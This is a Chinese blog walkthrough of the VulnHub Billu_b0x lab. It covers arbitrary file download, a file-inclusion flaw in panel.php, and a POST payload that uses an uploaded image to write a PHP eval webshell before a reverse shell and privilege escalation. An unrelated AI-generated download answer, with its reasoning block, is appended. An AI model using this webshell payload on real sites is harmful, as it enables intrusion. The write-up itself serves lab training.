vulnhub:Billu_b0x

本文档详细介绍了在Vulnhub上进行的Billu_b0x靶机挑战。首先通过nmap进行端口扫描,接着审计HTML源码和使用SQLmap。发现任意文件下载漏洞,继而进行代码审计,揭示了文件包含攻击的可能性。尽管遇到了文件上传验证的阻碍,但最终成功获取数据库凭证,并利用phpmyadmin登录。通过上传图片马和构造payload,实现了远程连接和shell反弹,为进一步提权奠定了基础。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境搭建

https://download.vulnhub.com/billu/Billu_b0x.zip
hash:ebcb435522917a67b54274900b37c6af

开搞

首先nmap开路

image
访问http://192.168.14.149/
image

向世界上最帅老男人致敬

查看HTML源码并没什么*用,SQLmap无果后遍历目录
image
访问http://192.168.14.149/test.php报错缺少参数file
image
尝试POST提交file=test.php此处为任意文件下载,将目录遍历出的文件全部下载开始代码审计。
image

审计

主页登录成功后跳转至panel.php查看panel.php源码第33行起,当load为非add与show时可构造任意文件包含攻击

if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}

文件上传验证文件后缀与文件类型,经测试无法构造绕过。

$image=array('jpeg','jpg','gif','png');
	if(in_array($r,$image))
	{
		$finfo = @new finfo(FILEINFO_MIME); 
	$filetype = @$finfo->file($_FILES['image']['tmp_name']);
		if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
利用

c.php中找到数据库账号密码billu/b0x_billu,登录phpmyadmin找到用户名口令
image
登录成功后上传图片马到uploaded_images/目录下构造payload如下

POST /panel.php
continue=&load=uploaded_images/trial.png&trial=file_put_contents('test.php','<?php @eval($_POST[test]);?>');

菜刀连接uploaded_images/test.php查看版本
image
反弹shell
image
提权
image
https://www.exploit-db.com/exploits/37292/
写入免密密匙 然后。。就没有然后了

<think>好的,我需要处理用户关于下载billu_b0x的请求。首先,用户提到想通过百度网盘下载这个资源,并引用了某个参考来源。根据引用内容,用户可能已经有一个百度网盘的链接,但需要提取码wxhn。不过,我需要验证这个链接是否仍然有效,以及资源是否安全合规。 接下来,我需要考虑用户可能遇到的问题。例如,链接失效、提取码错误,或者下载后的文件无法正确导入VMware。此外,用户可能对设置NAT模式的网络配置有疑问,或者渗透测试过程中遇到技术障碍。 另外,用户的需求可能不仅限于下载,还可能包括如何配置环境和进行后续的渗透测试步骤。因此,生成相关问题时,需要涵盖下载步骤、环境配置、常见问题解决以及实际应用场景。 最后,要确保回答符合系统级指令,正确使用LaTeX格式,并添加引用标识。同时,保持回答结构清晰,分步骤帮助用户解决问题,并保证信息的准确性和安全性。</think>关于billu_b0x靶场资源的下载与使用,根据引用内容中提供的信息[^1],具体操作步骤如下: 1. **百度网盘下载** - 访问百度网盘链接(需自行搜索最新有效链接) - 输入提取码:$wxhn$(注意字母大小写) - 下载后解压得到虚拟机文件 2. **虚拟机配置** ```bash # 设置NAT模式网络 VMware菜单栏 > 编辑 > 虚拟网络编辑器 > 选择NAT模式 ``` 需确保攻击机(如Kali Linux)和靶机使用相同的网络模式,配置示意图: $$ \begin{cases} \text{攻击机IP} \in 192.168.153.0/24\\ \text{靶机IP} \in 192.168.153.0/24 \end{cases} $$ 3. **渗透测试验证** 建议使用Nmap进行基础探测: ```python import nmap scanner = nmap.PortScanner() scanner.scan('192.168.153.0/24', arguments='-sP') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值